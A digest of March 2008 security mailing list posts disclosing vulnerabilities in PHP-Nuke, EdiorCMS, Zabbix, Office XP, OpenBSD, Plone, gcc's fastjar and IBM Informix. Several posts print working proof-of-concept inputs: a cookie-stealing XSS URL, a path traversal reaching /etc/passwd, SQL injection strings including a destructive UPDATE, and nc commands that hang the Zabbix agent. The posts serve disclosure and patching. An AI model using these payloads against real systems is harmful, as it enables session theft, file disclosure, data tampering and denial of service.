Re: Directory traversal and DoS in WinIPDS G52-33-021
The listed issues have been resolved in version G52-33-022. See release note here: http://www.intermate.com/winIPDS_support
Re: PHP-Nuke Module NukeC30 sql injection
dont copy http://www.secumania.org/exploits/web-applications/php~nukec30-sql-injection-vulnerability-2008030742897/
XSS in PHP-Nuke (eWeather module)
//XSS in PHP-Nuke (eWeather module) PHP-Nuke (http://phpnuke.org): PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases. eWeather module (http://www.janitorialservice.us): Weather module based on eWeather.biz data with 3 additional blocks 2 side and one center block. ///Details From source-code of /modules/eWeather/index.php Line 35: $zipCode=$chart; Line 47: echo div align =\center\h2USA weather for zip code $zipCode/h2; chart variable is unvalidated. ///Exploit http://example.net/modules.php?name=eWeatherchart=[XSS] http://example.net/modules.php?name=eWeatherchart=%3Cscript%3Ealert(document.cookie)%3C/script%3E ///Fix Change line 35 to $zipCode=(int)$chart; ///Author: NetJackal http://netjackal.by.ru http://hackerz.ir
Directory traversal in EdiorCMS V3.0
Directory traversal in EdiorCMS V3.0 Application: EdiorCMS V3.0 Vendor: http://www.edior.com Versions: 3.0 Platforms:ALL Bug: Directory traversal Exploitation: remote Date: 13 Mar 2008 Author: Shennan Wang e-mail: [EMAIL PROTECTED] POC: http://site/ecms/search.php?_SearchKeyWord=_SearchField=Title_SearchTemplate=../../../../../../etc/passwd
Zabbix (zabbix_agentd) denial of service
Hello, There is some DoS issue with zabbix which can be exploited by a malicious user from an authorized host. An attacker on the authorized host can cause the zabbix_agentd to hang, overconsuming CPU resources. This can be triggered by sending the agent a file checksum request (vfs.file.cksum[file]) with file argument being some special device node like /dev/zero or /dev/urandom (the latter rises kernel CPU usage even more). If the malicious user sends number_of_zabbix_agentd_children requests, then the zabbix_agentd service will not be able to serve any requests until it's restarted. Here's some example session : gat3way:/etc/zabbix# echo vfs.file.cksum[/dev/urandom] | nc localhost 10050 [1] 24429 gat3way:/etc/zabbix# echo vfs.file.cksum[/dev/urandom] | nc localhost 10050 [2] 24431 gat3way:/etc/zabbix# echo vfs.file.cksum[/dev/urandom] | nc localhost 10050 [3] 24433 gat3way:/etc/zabbix# echo vfs.file.cksum[/dev/urandom] | nc localhost 10050 [4] 24435 ...and some output from top: snip Tasks: 183 total, 5 running, 178 sleeping, 0 stopped, 0 zombie Cpu(s): 2.0%us, 97.0%sy, 1.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st snip PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 24381 zabbix 30 5 5056 1032 768 R 65 0.1 4:16.01 zabbix_agentd 24382 zabbix 30 5 5068 1044 776 R 50 0.1 4:12.18 zabbix_agentd 24380 zabbix 30 5 5068 1044 776 R 50 0.1 4:01.24 zabbix_agentd 24379 zabbix 30 5 5056 1036 772 R 31 0.1 4:08.24 zabbix_agentd zabbix_agentd accepts new connections, but does not serve them. The malicious user needs to connect from an authorized host, but it's not so hard to spoof it if he's on the same ethernet segment as the host running the zabbix_agent.
Rise of the spammers
Hi, According to the following press release of MessageLabs: http://www.messagelabs.com/resources/press/11351 the proportion of spam from Gmail increased two-fold from 1.3 percent in January to 2.6 percent in February Recently, researchers at Websense also spotted ITW (http://www.websense.com/securitylabs/blog/blog.php?BlogID=174) a bot trying to break Gmail's image captcha, with relative success though. So it seems pretty clear that spammers are abusing of legal services to spread their stuff although it is not so clear how they are doing so. AFAIK nobody has paid attention to the Gmail's audio captcha as attack vector. This captcha turns out to be extremely weak against simple fourier analysis so you can easily achieve a success rate of 90% even without implementing a HMM or any other well-known classifier. You can read the technical details in the following post http://blog.wintercore.com/?p=11 Video: http://blog.wintercore.com/files/breaking_gmail_audio_captcha.wmv Regards, Rubén. -- Wintercore Agustin de Betancourt, 21. 8th Floor. 28003 Madrid. Spain. Phone: +(34) 91 395 63 40 www.wintercore.com
Re: Firewire Attack on Windows Vista
Steve Shockley wrote: Stefan Kanthak wrote: 2. The typical user authentication won't help, we're at hardware level here, and no OS needs to be involved. So, if I understand you correctly, if I boot my machine into DOS the memory can be read over Firewire? If DMA is enabled on the firewire interface its possible! If the BIOS allows to boot from a firewire device then it will setup the hardware! Or does the machine need a Firewire driver loaded to be vulnerable? If the BIOS does not setup the firewire interface the some driver has to do it. So: it depends. You can also read the memory if you shut down but dont power off your system. Typically drivers leave their devices in working condition. Stefan
Re: Re: VHCS = 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
How we can fix this bug on VHCS Source Code ?
Rapid7 Advisory R7-0032: Microsoft Internet Explorer FTP Command Injection Vulnerability
Hello ml, I would like to point out that this vulnerability (Microsoft Internet Explorer FTP Command Injection Vulnerability) has been published long time ago, here is the advisory: http://www.securityfocus.com/archive/1/383722 Cheers, kralor
Update+Errata: Re: A paper by Amit Klein (Trusteer): OpenBSD DNS Cache Poisoning and Multiple O/S Predictable IP ID Vulnerability
Update+Errata for OpenBSD DNS Cache Poisoning and Multiple O/S Predictable IP ID Vulnerability (http://www.trusteer.com/docs/OpenBSD_DNS_Cache_Poisoning_and_Multiple_OS_Predictable_IP_ID_Vulnerability.pdf) Update ** OpenBSD === Apparently the OpenBSD team changed their mind (again...) and have now incorporated a fix for the DNS server transaction ID predictability, and the IP ID predictability, in the OpenBSD 4.3 branch. The solution in both cases resembles that of DragonFlyBSD and NetBSD. It seems that OpenBSD does not plan to address the DNS resolver transaction ID predictability though. FreeBSD === As expected, FreeBSD 7.0 was announced recently without a fix. This was communicated beforehand by the FreeBSD team and stated in the original paper. DragonFlyBSD DragonFlyBSD 1.12.0 is the first BSD operating system to roll out a solution to the IPv4 issue as part of the official version. Apple MacOS X 10.5.2, MacOS X Server 10.5.2, Darwin 9.2 (all sharing the same kernel: xnu-1228.3.13) === Apple did NOT fix the predictable IP ID issue in its products (in Leopard 10.5.2). IPv6 None of the vendors addressed the similar issues in IPv6. Misc. NetBSD has not addressed the issue in the RPC XID code. Errata ** The original paper mentioned that MacOS X has a particular implementation bug wherein it always sets seed=0. However, this is not accurate. the tmp variable changes each time ip_randomid() is called, and thus it is not guaranteed that seed=0. Nevertheless, it can be easily shown that seed=0 in about 50% of the key intervals. This is because at the re-keying time, tmp has probability of around 50% to have its higher 16 bits 0. So the Mac/Darwin platform remains particularly vulnerable. Thanks, -Amit CTO, Trusteer Amit Klein wrote: Hello BugTraq Recently I've been looking at the OpenBSD PRNG implementation for DNS transaction ID (OpenBSD ported BIND 9 into their code tree, but rolled their own PRNG for the DNS transaction ID field). I discovered a serious weakness in OpenBSD's PRNG, which allows an attacker to predict the next transaction ID (typically up to 8-10 guesses) given a series of consecutive 12-15 transaction IDs. As you may appreciate, this enables DNS cache poisoning for OpenBSD much like my earlier attacks on BIND 9, BIND 8 and Microsoft Windows DNS server. Interestingly enough, OpenBSD uses a flavor of this PRNG for another field, this time the IP fragmentation ID, part of the OpenBSD kernel network stack. The analysis carries out quite similarly to show that OpenBSD's IP ID is predictable as well, which gives way to O/S fingerprinting, idle-scanning, host alias detection, traffic analysis, and in some cases, even to TCP blind data injection. But it gets more interesting. Several other BSD operating systems copied the OpenBSD code for their own IP ID PRNG, so they're vulnerable too. This is particularly so with Apple's Mac OS X, Mac OS X Server and Darwin, but also with NetBSD, FreeBSD and DragonFlyBSD (the 3 latter O/S however only use this PRNG when the kernel flag net.inet.ip.random_id is set to 1; it is 0 by default, resulting in a sequential counter to be used instead...). OpenBSD, NetBSD and FreeBSD also use this PRNG for IP fragmentation ID normalization feature (e.g. scrub out random- id) in the packet filter module. Somewhat more distant flavors are used for various IPv6 fields across many BSD operating systems, which may be affected, and some other O/S not mentioned here, including possibly non-BSD O/S may be affected, since this code seems to have been extensively copied and modified. All the above mentioned vendors were contacted November 2007. FreeBSD, NetBSD and DragonFlyBSD committed a fix to their respective source code trees. OpenBSD decided not to fix, and Apple refused to provide any schedule for such fix. The full paper is available at the following URL: http://www.trusteer.com/docs/dnsopenbsd.html The impact per O/S is summarized below: * OpenBSD 3.3-4.2 o DNS server cache poisoning (predictable DNS transaction ID). * OpenBSD 2.6-4.2 o Idle-scanning, O/S fingerprinting, host alias detection, traffic analysis, TCP blind data injection, etc. (predictable IP fragmentation ID) in regular IP packets and raw IP packets. o Predictable IP fragmentation ID in Ethernet-inside-IP encapsulation, IP-inside-IP encapsulation, the CARP protocol, IP multicast routing, pfsync interface protocol, packet filter (IP packet normalization), and network bridge (ICMP error packets). * OpenBSD 2.5-4.2 o libc resolver predictable DNS transaction ID (the source UDP port is random though). * Mac OS X 10.0-10.5.1, Mac OS X Server 10.0-10.5.1, Darwin 1.0-9.1 o Idle-scanning, O/S fingerprinting, host alias detection, traffic analysis, TCP blind data injection, etc. (predictable IP fragmentation ID) in regular IP packets and
Re: Re: Re: VHCS = 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
You cannot fix it without re-designing the VHCS security model. The exploit is a simple example of the many many attack vectors that exist in the flawed design. If you fix this particular exploit it would be simple to create additional ones. The properly fix the security model of vhcs the following must be done: The vhcs php files must not be owned by www, and they must run as a privileged user(suexec). Also the .htacess management portion of vhcs is buggy and need to disabled or fixed. Look at how it handles creating files and modifying files.. It opens then and creates them as root. Leaving it open for a symlink attack. It gives me regret that after I give this to Wabisabilabi it appears public after 1 month.. Before wabisabilabi even posts it for sale..
PR08-02: Plone CMS Security Research - the Art of Plowning
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 PR08-02: Plone CMS Security Research: the Art of Plowning Product description: Plone is a ready-to-run content management system built on the powerful, and free, Zope application server. Plone is easy to set up, extremely flexible, and provides you with a system for managing web content that is ideal for project groups, communities, web sites, extranets and intranets. Plone is designed with security in mind by addressing the 10 most common security vulnerabilities in web applications (OWASP Top 10). Summary of issues identified: - - CSRF (Cross-site Request Forgeries) - - Credentials (username and password) stored in cookies - - Lack of authentication state on the server side - - Session cookies never, ever change (even after user password is changed or user logs out!) Full details can be found here: http://www.procheckup.com/Hacking_Plone_CMS.pdf Legal: Copyright 2008 Procheckup Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFH2WU/oR/Hvsj3i8sRAp3QAKChs5weInnTWxCN7oAzw2aVXr7r7wCdFoFx gB4JS+FXYGsW9fPGASWs17s= =QTdK -END PGP SIGNATURE-
Office XP Remote SQL Injection
Aria-Security Team (Persian Security Network) http://forum.Aria-Security.com (ENGLISH FORUM!) -- Shoutz: Aura, Null, Kinglet Office XP Remote SQL Injection Vendor: vso-xp.com Vulnerable File: MyIssuesView.asp Original Adivosry: http://forum.aria-security.com/showthread.php?p=21 PoC: MyIssuesView.asp?Issue_ID=[SQL INJECTION] Examples: MyIssuesView.asp?Issue_ID=-1%20having%201=1-- MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';-- List of columns QIssues.Issue_ID,QIssues.UserID,QIssues.Date,QIssues.Synopsis,QIssues.Status,QIssues.Category,QIssues.Category_ID,QIssues.Status_ID,QIssues.Priority,QIssues.Staff_ID,QIssues.Description,QIssues.IssueDescription,QIssues.LastStatus_ID,QIssues.UserFullName,QIssues.StaffFullName,QIssues.StaffEmail,QIssues.Type,QIssues.Priority_ID,QIssues.Group_ID,QIssues.UserEmail,QIssues.GroupName,QIssues.UserPhone,QIssues.CloseDate,QIssues.BrowserAgent,QIssues.CompanyName,QIssues.FileName,QIssues.FilePath,QIssues.CustomFields,QIssues.CloseBy,QIssues.Age Aria-Security Team The-0utl4w
[ MDVSA-2008:066 ] - Updated gcc packages fix directory traversal vulnerability in fastjar
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:066 http://www.mandriva.com/security/ ___ Package : gcc Date: March 13, 2008 Affected: 2007.0, Corporate 4.0 ___ Problem Description: Jurgen Weigert found a directory traversal vulnerability in fastjar versions prior to 0.93. This vulnerability allows user-assisted attackers to overwrite arbitrary files via a .jar file containing filename with ../ sequences. The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3619 ___ Updated Packages: Mandriva Linux 2007.0: 58c6cf8d35ddfc777fbd48d2417d3bf6 2007.0/i586/gcc-4.1.1-3.1mdv2007.0.i586.rpm 6d9975dc6f9fc193ee36cfe175646522 2007.0/i586/gcc-c++-4.1.1-3.1mdv2007.0.i586.rpm 92e7130f0779f2b5d242599c72e21a93 2007.0/i586/gcc-colorgcc-4.1.1-3.1mdv2007.0.i586.rpm bc1f9e4d70a6eca97195e7e426d94eb7 2007.0/i586/gcc-cpp-4.1.1-3.1mdv2007.0.i586.rpm 6a5d27006f95561eca088efa3ac8a43c 2007.0/i586/gcc-doc-4.1.1-3.1mdv2007.0.i586.rpm a6c61ac7709a9fd1dd1e4a871ea99043 2007.0/i586/gcc-doc-pdf-4.1.1-3.1mdv2007.0.i586.rpm 69312eed7668db205af979c3df66a318 2007.0/i586/gcc-gfortran-4.1.1-3.1mdv2007.0.i586.rpm 240b78599ebd782ada402dd8ac07cb4e 2007.0/i586/gcc-gnat-4.1.1-3.1mdv2007.0.i586.rpm 8c08be739f5bc62d48f6888adfce5371 2007.0/i586/gcc-java-4.1.1-3.1mdv2007.0.i586.rpm 0dcfb85325bcf952ce33677b75270da2 2007.0/i586/gcc-objc++-4.1.1-3.1mdv2007.0.i586.rpm dbedcd1fd07ab61450e68b0eda6be51a 2007.0/i586/gcc-objc-4.1.1-3.1mdv2007.0.i586.rpm 324c0689a68357d62c234cc5dadd38fb 2007.0/i586/gcj-tools-4.1.1-3.1mdv2007.0.i586.rpm 48ba63b8112c0959d9084efa472afa93 2007.0/i586/libffi4-devel-4.1.1-3.1mdv2007.0.i586.rpm 73889bab4e0d796bdc071d626967d418 2007.0/i586/libgcc1-4.1.1-3.1mdv2007.0.i586.rpm dd051e85774c000f0df1bed25acadd8d 2007.0/i586/libgcj7-4.1.1-3.1mdv2007.0.i586.rpm 2b64429673e3d7885c543869eed39405 2007.0/i586/libgcj7-base-4.1.1-3.1mdv2007.0.i586.rpm 6dafdb898c7062c867957f1ef88cca09 2007.0/i586/libgcj7-devel-4.1.1-3.1mdv2007.0.i586.rpm 405a024b5f35c6d5c4e5287e3d26b5e8 2007.0/i586/libgcj7-src-4.1.1-3.1mdv2007.0.i586.rpm 7cdf5c5b02558d05b905111013f93034 2007.0/i586/libgcj7-static-devel-4.1.1-3.1mdv2007.0.i586.rpm 782c84424be93b36c234726794115cb1 2007.0/i586/libgfortran1-4.1.1-3.1mdv2007.0.i586.rpm ebc2f4a242f6acdc0e31ff9c21c1aa49 2007.0/i586/libgnat1-4.1.1-3.1mdv2007.0.i586.rpm f3c06182f6d16414c0fa5df6ccde3a82 2007.0/i586/libmudflap0-4.1.1-3.1mdv2007.0.i586.rpm 8ece89f2404ebf1fe97b634400892184 2007.0/i586/libmudflap0-devel-4.1.1-3.1mdv2007.0.i586.rpm 5f960e7ff38589a750b5cbc5a5c6faee 2007.0/i586/libobjc1-4.1.1-3.1mdv2007.0.i586.rpm 5474e6e7cc1c4be77ac5b5727e33f201 2007.0/i586/libstdc++6-4.1.1-3.1mdv2007.0.i586.rpm 95abfd3cf0626c9f577c692d657fbe0c 2007.0/i586/libstdc++6-devel-4.1.1-3.1mdv2007.0.i586.rpm 5b3cf2d98f4fa41287ea01b2d2322049 2007.0/i586/libstdc++6-static-devel-4.1.1-3.1mdv2007.0.i586.rpm 1967b73c1d60f91830d851b9fecb3d64 2007.0/SRPMS/gcc-4.1.1-3.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: b33ecc48e1cf4d309c7b0f876cb37885 2007.0/x86_64/gcc-4.1.1-3.1mdv2007.0.x86_64.rpm d1ea79d8d432bf5b35c9fa9dbf417d0d 2007.0/x86_64/gcc-c++-4.1.1-3.1mdv2007.0.x86_64.rpm 6a398f2eef7cdaf45f9ac3aaeb95c4a9 2007.0/x86_64/gcc-colorgcc-4.1.1-3.1mdv2007.0.x86_64.rpm 84431e6af6d9da3d507b02560aea568e 2007.0/x86_64/gcc-cpp-4.1.1-3.1mdv2007.0.x86_64.rpm 6bf42856478b49d87ed3e6752934b27c 2007.0/x86_64/gcc-doc-4.1.1-3.1mdv2007.0.x86_64.rpm de12ae62fcd46bf0df204c3422081efd 2007.0/x86_64/gcc-doc-pdf-4.1.1-3.1mdv2007.0.x86_64.rpm fd633b5c4abb1e754228b2bc5fbf8d75 2007.0/x86_64/gcc-gfortran-4.1.1-3.1mdv2007.0.x86_64.rpm 1b4464e3ba008428d4cc5ce41ae368e6 2007.0/x86_64/gcc-gnat-4.1.1-3.1mdv2007.0.x86_64.rpm d4ac67158a0885fcf731d974450d4b21 2007.0/x86_64/gcc-java-4.1.1-3.1mdv2007.0.x86_64.rpm fc9ae07d8c9ef022dc06f1431b1cadc7 2007.0/x86_64/gcc-objc++-4.1.1-3.1mdv2007.0.x86_64.rpm af539cfedcf8223ddf4e98e86b492eb5 2007.0/x86_64/gcc-objc-4.1.1-3.1mdv2007.0.x86_64.rpm 78d4d268e34a928466087f8a8906d2e1 2007.0/x86_64/gcj-tools-4.1.1-3.1mdv2007.0.x86_64.rpm 13c4aafdea212b2a9071d2cb1648cf8a 2007.0/x86_64/lib64gcj7-4.1.1-3.1mdv2007.0.x86_64.rpm 18ea5d2ac44c333d985492a4b934fd73 2007.0/x86_64/lib64gcj7-devel-4.1.1-3.1mdv2007.0.x86_64.rpm d3f803e71c7bfc82e17336017d76097b 2007.0/x86_64/lib64gcj7-static-devel-4.1.1-3.1mdv2007.0.x86_64.rpm 14d84d366443c1e8353b254b835c57c1 2007.0/x86_64/libffi4-devel-4.1.1-3.1mdv2007.0.x86_64.rpm
ZDI-08-012: IBM Informix Dynamic Server Authentication Password Stack Overflow Vulnerability
ZDI-08-012: IBM Informix Dynamic Server Authentication Password Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-012 March 13, 2008 -- CVE ID: CVE-2008-0727 -- Affected Vendors: IBM -- Affected Products: IBM Informix -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5725. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of IBM's Informix Dynamic Server. User interaction is not required to exploit this vulnerability. Authentication is not required to exploit this vulnerability. The specific flaw exists in the oninit.exe process that listens by default on TCP port 1526. During authentication, the process does not validate the length of the supplied user password. An attacker can provide a overly long password and overflow a stack based buffer resulting in arbitrary code execution. -- Vendor Response: IBM has issued an update to correct this vulnerability. More details can be found at: http://www-1.ibm.com/support/docview.wss?uid=swg1IC55210 http://www-1.ibm.com/support/docview.wss?uid=swg1IC55209 -- Disclosure Timeline: 2007-11-07 - Vulnerability reported to vendor 2008-03-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED]